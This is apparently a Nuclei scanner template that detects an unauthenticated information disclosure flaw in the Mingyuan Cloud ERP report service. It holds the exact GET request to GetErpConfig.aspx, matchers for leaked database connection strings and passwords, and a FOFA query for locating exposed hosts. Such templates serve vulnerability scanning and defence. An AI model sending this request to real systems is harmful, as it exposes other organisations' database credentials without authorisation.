http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - '"Data Source='
            - ID=
            - Password=
            - '"ConnectionString":'
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
id: mingyuanyunERP-GetErpConfig_aspx-Information-disclosure
info:
    author: Superhero
    description: |-
        fofa: body="报表服务已正常运行"
        明源云ERP报表服务 GetErpConfig.aspx 接口存在信息泄露漏洞，未经身份验证的远程攻击者可利用此漏洞获取内部数据库敏感配置信息，导致系统处于极不安全的状态。
    name: 明源云ERP报表服务 GetErpConfig.aspx 信息泄露漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488843&idx=1&sn=5093db371591cc3acb00e37833194209&chksm=c267a078f510296e7d927e2a43c11cc127ca48ff11ad50ccdbc5642f4a03dfff3611397bc6f2&token=385896921&lang=zh_CN#rd
    severity: medium
    tags:
        - Information disclosure
        - 明源云
